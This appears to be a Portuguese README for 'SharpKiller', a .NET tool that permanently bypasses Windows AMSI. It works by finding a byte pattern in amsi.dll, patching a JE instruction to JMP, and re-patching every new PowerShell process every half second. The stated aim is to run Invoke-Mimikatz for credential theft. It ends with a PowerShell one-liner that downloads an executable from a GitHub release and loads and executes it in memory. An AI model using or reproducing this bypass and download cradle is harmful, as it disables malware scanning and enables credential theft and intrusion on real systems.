
Bypass vitalício de AMSI por @ZeroMemoryEx portado para o .NET Framework 4.8
Bypass de AMSI vitalício AMSI-Killer por @ZeroMemoryEx portado para .NET Framework 4.8.
[ x ] - Verificação em tempo real de novos processos powershell a cada 0,5 segundos -> Corrige automaticamente novas instâncias do powershell
obtemos o endereço exato da instrução de salto procurando o primeiro byte de cada instrução; essa técnica é eficaz mesmo diante de atualizações ou modificações no conjunto de dados de destino.
por exemplo:
| 48:85D2 | test rdx, rdx |
| 74 3F | je amsi.7FFAE957C694 |
| 48 : 85C9 | test rcx, rcx |
| 74 3A | je amsi.7FFAE957C694 |
| 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |
| 74 33 | je amsi.7FFAE957C694 |
o padrão de busca será assim:
{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

O programa testa o valor de RDX contra si mesmo. Se a comparação resultar em 0, o programa executa um salto para retornar. Caso contrário, o programa prossegue para avaliar a próxima instrução

não conseguimos executar "Invoke-Mimikatz"

corrigimos o primeiro byte e o alteramos de JE para JMP para que ele retorne diretamente


agora podemos executar "Invoke-Mimikatz"



$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));
Se você já viu esta mensagem e se perguntou sobre ela - bem-vindo à Interface AMSI do .NET! :-)
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."